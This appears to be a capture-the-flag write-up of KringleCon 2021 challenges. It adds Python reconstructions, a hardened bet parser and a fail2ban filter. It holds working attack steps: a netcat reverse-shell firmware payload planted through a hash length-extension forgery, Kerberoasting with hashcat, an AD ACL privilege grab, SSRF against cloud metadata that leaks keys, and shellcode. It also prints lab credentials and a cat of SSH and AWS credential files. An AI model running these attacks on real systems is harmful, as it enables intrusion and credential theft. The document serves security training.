fopen("registration.json", "r")                           = 0x5561ac2ab260
getline(0x7ffdb3455f20, 0x7ffdb3455f28, 0x5561ac2ab260, 0x7ffdb3455f28) = 22
strstr(""Registration" : True\n", "Registration")         = "Registration" : True\n"
strchr("Registration" : True\n", ':')                     = ": True\n"
strstr(": True\n", "True")                                = "True\n"
getline(0x7ffdb3455f20, 0x7ffdb3455f28, 0x5561ac2ab260, 0x7ffdb3455f28) = -1
system("/bin/initialize_cotton_candy_sys"...

Final registration.json:
"Registration" : True
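The ltrace runs above expose the whole check: per line, strstr for "Registration", strchr for ':' starting at that match, strstr for "True" after the colon, and system() as soon as one line passes. Despite the .json name, nothing parses JSON. The added example below (a reconstruction of what the trace shows, not the binary's source) reproduces that logic in Python next to a real JSON check, so the mismatch is visible: the line that satisfies the program is not valid JSON, a valid JSON document with `true` is rejected, and a line that says `"Registration": false` still passes if the word True appears later on it.

```python
import json


def line_registers(line):
    """One line through the inferred check: strstr for "Registration", then
    strchr for ':' after that match, then strstr for "True" after the colon."""
    key = line.find("Registration")
    if key < 0:
        return False
    colon = line.find(":", key)
    if colon < 0:
        return False
    return line.find("True", colon) >= 0


def text_registers(text):
    """Mirror the getline loop: the program keeps reading until one line passes
    or the file ends, so a single passing line anywhere is enough."""
    return any(line_registers(line) for line in text.splitlines())


def json_registers(text):
    """What an actual JSON check would accept: an object with "Registration": true."""
    try:
        doc = json.loads(text)
    except ValueError:
        return False
    return isinstance(doc, dict) and doc.get("Registration") is True


if __name__ == "__main__":
    for candidate in ('"Registration" : True', '{"Registration": true}',
                      '{"Registration": false, "note": "True"}'):
        print(f"{candidate!r:45} substring check: {text_registers(candidate)!s:5} "
              f"JSON check: {json_registers(candidate)}")
```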



Challenge: Slot machine

I noticed that sending a negative value for numline rewarded positive money.

POST /api/v1/02b05459-0d09-4881-8811-9a2a7e28fd45/spin HTTP/2
Host: slots.jackfrosttower.com
Cookie: XSRF-TOKEN=eyJpdiI6InFUVVhZelcybzAzc3BIT1g0Ui9MVHc9PSIsInZhbHVlIjoiditjTUJTZXFBZWxleWJlcmpqNUZvSGppNktpSHg2RFQ2M0EwWXBUdklkeExQZ0tDejdIenBNellxRE50ZGI2WGNKWTN5SjdzU2xvWWhxV1pNT3BicFB4amtXUE43MU9VdkJVcXhkMTg5MUh1c0E5NW1OUlZ5b3hZQy9ZZXcvakkiLCJtYWMiOiJjZTFkNGNhNWJhMWVhNTE5NTQ5ODYwZTVkNGQ1OTUzMTlkOGVlMjZjM2M4ODY0NGI4YzZjMWUzYTMwYTczZTNlIiwidGFnIjoiIn0%3D; slots_session=eyJpdiI6Ik9Dbnd1MWdQcHYxd3FkeHNzcS9KZGc9PSIsInZhbHVlIjoiRVh1S3ZVTTJ1SmhDd1ZUc0xTQW9xOTUwM3JocVdPRTc0THIwMUd4TnVac2hWRzdEVzMxS3Z2SVZvbkZWNElMUnZYb1MwTitzTTFoWUROcUFHMEhISkNzZldTNndXT0Rha1VrM2lpa1dha3Z1azhRRmF1NURJZHdlNExMcVZWdWkiLCJtYWMiOiI1YWIxM2U4Yzk0M2RlZjdjYTBiNzgzZThhYmZmMDBmZTQ4OWNmMTJhMzM1MjFkNzIwMmJhOTk3YzFjMjBiMGM4IiwidGFnIjoiIn0%3D
Content-Length: 36
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
Accept: application/json
Sec-Ch-Ua-Mobile: ?0
X-Ncash-Token: 44688b52-1e7d-4551-af97-8b19db6e445b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/x-www-form-urlencoded
Origin: https://slots.jackfrosttower.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://slots.jackfrosttower.com/uploads/games/frostyslots-206983/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

betamount=100&numline=-10000&cpl=0.5
== output

HTTP/2 200 OK
Date: Fri, 17 Dec 2021 22:41:29 GMT
Date: Fri, 17 Dec 2021 22:41:29 GMT
X-Powered-By: PHP/7.4.26
Cache-Control: no-cache, private
Content-Type: application/json
X-Ratelimit-Limit: 60
X-Ratelimit-Remaining: 59
Access-Control-Allow-Origin: *
Via: 1.1 google
Alt-Svc: clear

{"success":true,"data":{"credit":575073.75,"jackpot":0,"free_spin":0,"free_num":0,"scaler":0,"num_line":-10000,"bet_amount":100,"pull":{"WinAmount":0,"FreeSpin":0,"WildFixedIcons":[],"HasJackpot":false,"HasScatter":false,"WildColumIcon":"","ScatterPrize":0,"SlotIcons":["icon2","scatter","scatter","icon3","icon7","icon6","icon5","icon7","scatter","icon6","scatter","icon9","wild","icon5","icon4"],"ActiveIcons":[],"ActiveLines":[]},"response":"I'm going to have some bouncer trolls bounce you right out of this casino!"},"message":"Spin success"}
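The response echoes `num_line: -10000` back unchanged and the credit goes up, so the server multiplies the bet by the line count and debits the result without ever checking the sign. The added example below is not the casino's PHP (which is not on the page); it is a Python sketch of the vulnerable arithmetic next to a hardened version that parses, type-checks and bounds every client-supplied field before touching the balance. MAX_LINES and the bet limits are assumed values.

```python
from decimal import Decimal, InvalidOperation

# Assumed game limits; the real server's bounds are not on the page.
MAX_LINES = 20
MIN_BET = Decimal("1")
MAX_BET = Decimal("100")


def spin_unchecked(credit, form):
    """Vulnerable shape: arithmetic straight from the client's form fields.

    With numline=-10000 the "cost" is negative, so the player's credit grows.
    """
    cost = Decimal(form["betamount"]) * int(form["numline"])
    return Decimal(credit) - cost


def parse_spin(form):
    """Hardened: parse, type-check and bound every client-supplied field."""
    try:
        bet = Decimal(form["betamount"])
        lines = int(form["numline"])
    except (KeyError, ValueError, InvalidOperation) as e:
        raise ValueError(f"malformed spin parameters: {e}") from e
    if not bet.is_finite() or not (MIN_BET <= bet <= MAX_BET):
        raise ValueError("betamount out of range")
    if not (1 <= lines <= MAX_LINES):
        raise ValueError("numline out of range")
    return bet, lines


def spin_checked(credit, form):
    """Return (True, new_credit) or (False, reason); a bet can never raise the balance."""
    try:
        bet, lines = parse_spin(form)
    except ValueError as e:
        return False, str(e)
    cost = bet * lines
    if cost > Decimal(credit):
        return False, "insufficient credit"
    return True, Decimal(credit) - cost


if __name__ == "__main__":
    hostile = {"betamount": "100", "numline": "-10000", "cpl": "0.5"}
    print("unchecked:", spin_unchecked("1000", hostile))
    print("checked:  ", spin_checked("1000", hostile))
```

Decimal rather than float keeps the ledger exact, and the `is_finite()` test matters: `Decimal("NaN")` would otherwise raise inside the comparison instead of being rejected cleanly.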



Challenge: #hohono

I struggled with this one for a bit learning fail2ban syntax… got it finally; here is what I had.

#filter (filter.d/naughty.conf)
[Definition]

# fail2ban strips the timestamp before matching, which is why every pattern
# starts with "^ " (the space that followed the date). <HOST> is fail2ban's
# placeholder for the source address; it is the address that gets banned.
failregex = ^ Login from <HOST> rejected due to unknown user name$
            ^ Failed login from <HOST> for
            ^ <HOST> sent a malformed request$
            ^ Invalid heartbeat ('.*') from <HOST>$

ignoreregex = Login from <HOST> successful$
              <HOST>: Request completed successfully$
              Valid heartbeat from <HOST>$

#jail
[naughty]
enabled = true
filter = naughty
logpath = /var/log/hohono.log
action = naughty
maxretry = 10
findtime = 1h
bantime = 1h

#action (action.d/naughty.conf)
[Definition]
actionstart =
actionstop =
actioncheck = /root/naughtylist list
actionban = /root/naughtylist add <ip>
actionunban = /root/naughtylist del <ip>
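The part of fail2ban that is hard to see from the config alone is the counting: the filter only classifies lines, and the jail bans a host once maxretry matches fall inside a single findtime window. The added example below (my code, not fail2ban's and not the challenge's) expands the filter's patterns the way fail2ban does (`<HOST>` becomes a named group, the timestamp is split off first) and runs the jail's 10-in-1h rule over constructed log lines. The `YYYY-MM-DD HH:MM:SS message` layout of those lines is an assumption; hohono.log's real format is not on the page, and the parentheses in the heartbeat pattern are escaped here because the constructed line contains literal parentheses.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# The filter's failregex/ignoreregex with fail2ban's <HOST> placeholder
# expanded to a named group, the way fail2ban does internally. The leading
# space mirrors the "^ " in the filter: fail2ban strips the timestamp first.
HOST = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"
FAILREGEX = [re.compile(p) for p in (
    rf"^ Login from {HOST} rejected due to unknown user name$",
    rf"^ Failed login from {HOST} for ",
    rf"^ {HOST} sent a malformed request$",
    rf"^ Invalid heartbeat \('.*'\) from {HOST}$",
)]
IGNOREREGEX = [re.compile(p) for p in (
    rf"^ Login from {HOST} successful$",
    rf"^ {HOST}: Request completed successfully$",
    rf"^ Valid heartbeat from {HOST}$",
)]
TS_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})( .*)$")  # assumed log layout


def classify(line):
    """Return (timestamp, host) for a failure line, None for anything else."""
    m = TS_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    rest = m.group(2)
    if any(rx.match(rest) for rx in IGNOREREGEX):
        return None
    for rx in FAILREGEX:
        hit = rx.match(rest)
        if hit:
            return ts, hit.group("host")
    return None


def bans_for(lines, maxretry=10, findtime=timedelta(hours=1)):
    """Apply the jail's rule: ban a host when maxretry failures fall inside one findtime window."""
    recent = defaultdict(deque)
    banned = []
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        ts, host = hit
        if host in banned:
            continue  # bantime expiry is fail2ban's unban timer; not modelled here
        q = recent[host]
        q.append(ts)
        while q and ts - q[0] > findtime:
            q.popleft()  # drop failures that have aged out of the window
        if len(q) >= maxretry:
            banned.append(host)
    return banned


BASE = datetime(2021, 12, 20, 13, 0, 0)


def _stamp(minutes):
    return (BASE + timedelta(minutes=minutes)).strftime("%Y-%m-%d %H:%M:%S")


# Constructed log lines: 10.0.0.5 fails ten times in ten minutes (banned);
# 10.0.0.6 fails nine times, then once more two hours later (never ten in an
# hour, so not banned); the rest are successes or single events.
SAMPLE_LOG = (
    [f"{_stamp(i)} Failed login from 10.0.0.5 for elf{i}" for i in range(10)]
    + [f"{_stamp(5 * i)} Login from 10.0.0.6 rejected due to unknown user name" for i in range(9)]
    + [f"{_stamp(180)} Login from 10.0.0.6 rejected due to unknown user name"]
    + [f"{_stamp(3)} Login from 10.0.0.7 successful"]
    + [f"{_stamp(4)} Invalid heartbeat ('xyz') from 10.0.0.8"]
    + [f"{_stamp(6)} 10.0.0.9: Request completed successfully"]
)

if __name__ == "__main__":
    print("would ban:", bans_for(SAMPLE_LOG))
```

To check the real filter rather than this model, `fail2ban-regex /var/log/hohono.log /etc/fail2ban/filter.d/naughty.conf` prints match counts per pattern and flags lines that matched nothing.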



Challenge: Shellcode Primer


Solution:

; Get a pointer to the path string: call pushes the address of the next
; byte (the string itself), which the pop below retrieves
call open_file
db '/var/northpolesecrets.txt',0
open_file:
pop rdi             ; rdi = address of the path
mov rsi, 0          ; flags = O_RDONLY
mov rdx, 0          ; mode (unused for O_RDONLY)
mov rax, 2          ; sys_open
syscall             ; rax = file descriptor

; read file
push rax            ; save the file descriptor on the stack
sub rsp, 200        ; reserve a 200-byte buffer below it

xor rax, rax        ; sys_read
mov rdi, [rsp+200]  ; file descriptor (just above the buffer)
mov rsi, rsp        ; address of buffer
mov rdx, 200        ; size of buffer
syscall             ; rax = number of bytes read

; Call sys_write to write the contents from rsp to stdout (1)
mov rdx, rax        ; length = bytes actually read, not the whole buffer
mov rax, 1          ; sys_write
mov rdi, 1          ; stdout
mov rsi, rsp        ; buffer
syscall

; Call sys_exit
mov rax, 60         ; sys_exit
mov rdi, 0          ; status 0
syscall

challenge output:
Stdout
Secret to KringleCon success: all of our speakers and organizers, providing the gift of cyber security knowledge, free to the community.



Challenge: Printer exploitation

This challenge was unique, thanks again Ron!


Steps:
- Create the file you want to execute, which may just be a shell script sending what you want to the designated output directory.
- Zip the new file (payload.zip).
- Run the hash_extender script with the original firmware zip as the file and the payload zip as the append. The server publishes secret_length (16) and the algorithm (SHA256), which is everything a length-extension attack needs.
- Put the script's output (the extended data and the new signature) into a new JSON file formatted like the original JSON we downloaded from the server.
- Upload the new JSON file.

└─$ git clone https://github.com/iagox86/hash_extender.git

Use hash_extender with firmware.bin: zip it up (payload.zip) and extend it onto the downloaded existing zip (test.zip).

└─$ ./hash_extender --secret=16 --file=test.zip --appendfile=payload.zip --signature 2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97 --format sha256

└─$ ls
firmware.bin  payload.zip
                                                                                      
└─$ cat firmware.bin 
#!/bin/bash
nc -e /bin/sh <ip> 9191
  
firmware.json

root@web:~# nc -lvp 9191
Listening on [0.0.0.0] (family 0, port 9191)
Connection from 20.219.121.34.bc.googleusercontent.com 46082 received!
whoami
app
cat /var/spool/printer.log
Documents queued for printing
=============================

Biggering.pdf
Size Chart from https://clothing.north.pole/shop/items/TheBigMansCoat.pdf
LowEarthOrbitFreqUsage.txt
Best Winter Songs Ever List.doc
Win People and Influence Friends.pdf
Q4 Game Floor Earnings.xlsx
Fwd: Fwd: [EXTERNAL] Re: Fwd: [EXTERNAL] LOLLLL!!!.eml
Troll_Pay_Chart.xlsx



Challenge: Kerberoasting on an Open Fire

Easily my favorite challenge, and the most difficult.

ElfU Registration Portal
New Student Domain Account Creation Successful!
You can now access the student network grading system by SSH'ing into this asset using the command below:
ssh hkcyypxgme@grades.elfu.org -p 2222
ElfU Domain Username: hkcyypxgme
ElfU Domain Password: Unojcjijx!

Once you SSH in, press ctrl+d to drop back to the Python prompt...

spawn a shell
'import pty; pty.spawn("/bin/bash")'

change shell so you can scp files over if you want
chsh -s /bin/bash

Nmapped the local stuff... also did ps aux / arp -a and saw a few other interesting hosts; I don't think I captured all of them in the nmaps.

Nmap scan report for 172.17.0.1
Host is up (0.00073s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Nmap scan report for grades.elfu.local (172.17.0.2)
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 172.17.0.3
Host is up (0.00020s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
42/tcp   open  nameserver
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
636/tcp  open  ldapssl
1024/tcp open  kdm
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Nmap scan report for 172.17.0.4
Host is up (0.00084s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap scan report for 172.17.0.5
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

I never ended up using SharpHound
scp -P 2222 SharpHound.ps1 hkcyypxgme@grades.elfu.org:/home/hkcyypxgme

I did snag this: https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py

python3 smbclient.py 'elfu.local/hkcyypxgme:Unojcjijx!@10.128.1.53'


fcghzadjfl@grades:~$ python3 GetUserSPN.py elfu.local/suxekitihx:Yqygyshmr@ -dc-ip 10.128.1.53 -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName                 Name      MemberOf  PasswordLastSet             LastLogon                   Delegation 
-----------------------------------  --------  --------  --------------------------  --------------------------  ----------
ldap/elfu_svc/elfu                   elfu_svc            2021-10-29 19:25:04.305279  2022-01-01 22:22:20.256267             
ldap/elfu_svc/elfu.local             elfu_svc            2021-10-29 19:25:04.305279  2022-01-01 22:22:20.256267             
ldap/elfu_svc.elfu.local/elfu        elfu_svc            2021-10-29 19:25:04.305279  2022-01-01 22:22:20.256267             
ldap/elfu_svc.elfu.local/elfu.local  elfu_svc            2021-10-29 19:25:04.305279  2022-01-01 22:22:20.256267             




On the website this comment existed as the hint for cracking the password; I used the tool from the hints, which strips out the digits:
register.elfu.org -
<!-- Remember the groups battling to win the karaoke contest earlier this year? I think they were rocks4socks, cookiepella, asnow2021, 
            v0calprezents, Hexatonics, and reindeers4fears. Wow, good times! -->

were
rocks
socks
cookiepella
asnow
calprezents
Hexatonics
reindeers
fears
Wow
good
times
rocks4socks
cookiepella
snow2021
v0calprezents
Hexatonics
reindeers4fears
rockssocks
cookiepella
asnow
vcalprezents
Hexatonics
reindeersfears

Decided to remove the digits, like the CeWL script does, and add those variants to the wordlist, then ran hashcat against the captured TGS-REP hash:
hashcat -m 13100 -a 0 ./captured.txt --potfile-disable -r ./password_cracking_rules/OneRuleToRuleThemAll.rule --force -O -w 4 --opencl-device-types 1,2 wordlist.txt

$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$a0e75cf96d8b60dddcd6d91e08e063e7$d4c3a561978d99d9e6218f5746ad511466bfd41fcf991375adec11147311320144ed8166beac3de02e7dda18cb00478d38d0090266fb5455d55a613efde194a6993fcefe61e0e6fc2045878f1a4d9ac21164cd07bbececb1f1b075e7ee4832c2f6c70fe28bf9e6cc6e135e29e6b5608bdc03649e6975199eb83fc7e29fa68aff9150a3ef104204cf508645d5a2cf200489d14cfe9be300df2ca08a2257b95d3efff4be2c6568a196d9eeefe99aa2dc7028770f5e31b229e1c7986dee327f3ed19e06f63b14708d2d501c21aed6b92968fd70dc881ce46903f0eb032aa3c846b3385437c20b6fc031f6488c261e8b6f7e23e99aa95c3053036469cb7222527dcbb1b759d1be717ff21b8b3f843241d661be86c1c34826b4e7dd7dcd859971d160da35cbe79470da8664ce671096fee216e9b7232f4eca1c38f8e4a0a7031f9b8422257a451eaa3a6c06ab222d802e1d49e31ef2ea5b671465403134d2f58840f770049603e05a6e8e2962ce4327b57d67509681c4bbf2f4cb30ef93c1cbbaa19540ffaf6e70df3b831bb285bd9d249af64bcbe525aadeb4d252880ae3ad7a2e7d2063f5df91fefd52f3b0a49a5d4078df5976e19f58e2b2aa1bde3d91f077320889fcedfa7be8764d9d9e9a397d6c7d4e586315fb7c91587e0da7df67aba7bdb5aa5fa47a9ffe1995406537e80a0555c83d996810a9b5b4d78c80d481fc4cd1e1feb16321a56822e852186f13246704af73a72a63474bf491ab98dd051f239a6212be22957fa71834f9ed0f6ad260f6c764d287c3db1c053b8adc9fe5d9819ee55a1c17886f8ea51a93c171afe673bea4643ba4825d0216f9b0f1436a6c060be0caa303b1eb4af167395d84a63ba1aa2c4fe6f49a1bec722b29721dbe879db6b6369855833d187ba865937dce6c2ff97c67dfea3a8c5486859f04757e60bbd084aa3844c8bbf971c97a428c9a4f9c795cb4881e539b7e1bf6fa37b92cd3f1c5060864dc6821807da1144cebdfac9cc5954bfc22a7ae575ea9b20d2c00b250f2fb651b37a715b95dfb270532ec69bca85626c91abc4a3fab9631601412dc98b6b16e8e1edead285a1e723d6b60944d8c813872d25a281bdc4a588fa07185cf98078e6683cac8ae7643f8c0d0faa513483464763990bccf158b0966873c3bb9a52ff9b30323fc8a07c6503a1de160d17d62094fb426582313ca74ec0e3de0dfb771204f2fc9206f3ae120df7b9db4d46745dd2efd9fc0ef15959d23750b9ec8a7392635277e2250a8eead71dcf98e2ebb5378e52d3b028c2d66a5602f9a25a342863175558259711065905659515331af3bae1fadb047fdd0afffd2172b1
b189fea9f21a2e5787c81366da9330f05648ba51791900f4a681e09ab8d240c201010ffbc86c9888cb8d09cf1f6d4d22d66f875f43f6e5e8d172cda37d59deea2354f713b862a1e9a:Snow2021!
                                                       
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_sv...2a1e9a
Time.Started.....: Sun Jan  2 14:32:56 2022, (2 secs)
Time.Estimated...: Sun Jan  2 14:32:58 2022, (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (wordlist.txt)
Guess.Mod........: Rules (./password_cracking_rules/OneRuleToRuleThemAll.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2041.3 kH/s (10.71ms) @ Accel:256 Loops:256 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 3663360/4679550 (78.28%)
Rejected.........: 0/3663360 (0.00%)
Restore.Point....: 0/90 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:40448-40704 Iteration:0-256
Candidate.Engine.: Device Generator
Candidates.#1....: The0307 -> ceindeersfears
Hardware.Mon.#1..: Util: 91%

Started: Sun Jan  2 14:32:55 2022
Stopped: Sun Jan  2 14:33:00 2022


Snow2021!


$password = ConvertTo-SecureString "Snow2021!" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\elfu_svc", $password)
Enter-PSSession -ComputerName 10.128.3.30 -Credential $creds -Authentication Negotiate

Used smbclient.py to download the .ps1 files and looked inside GetProcessInfo.ps1:

cat GetProcessInfo.ps1 
$SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred -Authentication Negotiate


Once you connect to the PS session, ls shows you this interesting file:

-a----         1/3/2022   1:49 PM           6331 adGroupList.csv 

At the bottom we see the AD group "researchdepartment"... huh.

$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])

$ldapConnString = "LDAP://CN=ResearchDepartment,CN=Users,DC=elfu,DC=local"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$domainDirEntry.get_ObjectSecurity().Access


Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "hkcyypxgme"
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
$IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$secOptions = $domainDirEntry.get_Options()
$secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
$domainDirEntry.RefreshCache()
$domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "hkcyypxgme"
$password = "Unojcjijx!"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
$user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
$sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
$b=New-Object byte[] $sid.BinaryLength
$sid.GetBinaryForm($b,0)
$hexSID=[BitConverter]::ToString($b).Replace('-','')
$domainDirEntry.Add("LDAP://<SID=$hexSID>")
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

smbclient 172.17.0.3 
open
login
get SantaSecretToAWonderfulHolidaySeason.pdf

scp -P 2222 hkcyypxgme@grades.elfu.org:/home/hkcyypxgme/SantaSecretToAWonderfulHolidaySeason.pdf .


Opened the PDF; the word was `kindness`.



Splunk Challenges


task 1 + 2 search criteria: `User=eddie git partnerapi`
git status
git@github.com:elfnp3/partnerapi.git
task 3 search: User=eddie docker
docker compose up
task 4
https://github.com/snoopysecurity/dvws-node
task 5
holiday-utils-js
task 6
/usr/bin/nc.openbsd
task 7 (found the cat of all the files)
6 (cat /home/eddie/.aws/credentials /home/eddie/.ssh/authorized_keys /home/eddie/.ssh/config /home/eddie/.ssh/eddie /home/eddie/.ssh/eddie.pub /home/eddie/.ssh/known_hosts)
task 8 (can look around the event)
preinstall.sh



Challenge: Now hiring!

Noticed we could SSRF in the inputWorkSample field, and it stored the stuff under the inputName field. Turns out you could inspect it in the browser, but I just wget'd it and looked at the file:

GET /?inputName=sillymemerfun&inputEmail=b@b.com&inputPhone=555-555-5555&inputField=Crayon+on+walls&resumeFile=alabaster_badge.pdf&inputWorkSample=http://169.254.169.254/latest/meta-data/iam/security-credentials/jf-deploy-role&additionalInformation=t&submit= HTTP/1.1
Host: apply.jackfrosttower.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://169.0376.169.254/latest/meta-data
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Content-Length: 0
X-aws-ec2-metadata-token-ttl-seconds: 21600


➜  Desktop wget https://apply.jackfrosttower.com/images/sillymemerfun.jpg
--2022-01-04 20:27:56--  https://apply.jackfrosttower.com/images/sillymemerfun.jpg
Resolving apply.jackfrosttower.com (apply.jackfrosttower.com)... 34.117.109.159
Connecting to apply.jackfrosttower.com (apply.jackfrosttower.com)|34.117.109.159|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 308 [image/jpeg]
Saving to: ‘sillymemerfun.jpg’

sillymemerfun.jpg                   100%[================================================================>]     308  --.-KB/s    in 0s

2022-01-04 20:27:56 (147 MB/s) - ‘sillymemerfun.jpg’ saved [308/308]

➜  Desktop vim sillymemerfun.jpg
{
        "Code": "Success",
        "LastUpdated": "2021-05-02T18:50:40Z",
        "Type": "AWS-HMAC",
        "AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
        "SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
        "Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
        "Expiration": "2026-05-02T18:50:40Z"



Challenge: Customer Complaint Analysis

Answer is: Flud Hagg Yaqh


Frame 384: 1025 bytes on wire (8200 bits), 1025 bytes captured (8200 bits)
Ethernet II, Src: Dell_14:9e:21 (00:12:3f:14:9e:21), Dst: NorthPol_01:26 (90:4e:91:20:01:26)
Internet Protocol Version 4, Src: 10.70.84.251, Dst: 10.70.84.10
0100 .... = Version: 4
.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
Total Length: 1011
Identification: 0xeb70 (60272)
Flags: 0x40, Don't fragment
Fragment Offset: 0
Time to Live: 64
Protocol: TCP (6)
Header Checksum: 0x8e03 [validation disabled]
[Header checksum status: Unverified]
Source Address: 10.70.84.251
Destination Address: 10.70.84.10
Transmission Control Protocol, Src Port: 36676, Dst Port: 80, Seq: 1, Ack: 1, Len: 959
Hypertext Transfer Protocol
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "name" = "Muffy VonDuchess Sebastian"
Key: name
Value: Muffy VonDuchess Sebastian
Form item: "troll_id" = "I don't know. There were several of them."
Key: troll_id
Value: I don't know. There were several of them.
Form item: "guest_info" = "Room 1024"
Key: guest_info
Value: Room 1024
Form item: "description" = "I have never, in my life, been in a facility with such a horrible staff. They are rude and insulting. What kind of place is this? You can be sure that I (or my lawyer) will be speaking directly with Mr. Frost!"
Key: description
Value: I have never, in my life, been in a facility with such a horrible staff. They are rude and insulting. What kind of place is this? You can be sure that I (or my lawyer) will be speaking directly with Mr. Frost!
Form item: "submit" = "Submit"
Key: submit
Value: Submit

Frame 348: 883 bytes on wire (7064 bits), 883 bytes captured (7064 bits)
Ethernet II, Src: NorthPol_28:2d (90:4e:91:20:28:2d), Dst: NorthPol_01:26 (90:4e:91:20:01:26)
Internet Protocol Version 4, Src: 10.70.84.106, Dst: 10.70.84.10
Transmission Control Protocol, Src Port: 40630, Dst Port: 80, Seq: 1, Ack: 1, Len: 817
Hypertext Transfer Protocol
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "name" = "Hagg"
Key: name
Value: Hagg
Form item: "troll_id" = "2013"
Key: troll_id
Value: 2013
Form item: "guest_info" = "Incredibly angry lady in room 1024"
Key: guest_info
Value: Incredibly angry lady in room 1024
Form item: "description" = "Lady call front desk. I am walk by so I pick up phone. She is ANGRY and shout at me. Say she has never been so insult. I say she probably has but just didn't hear it."
Key: description
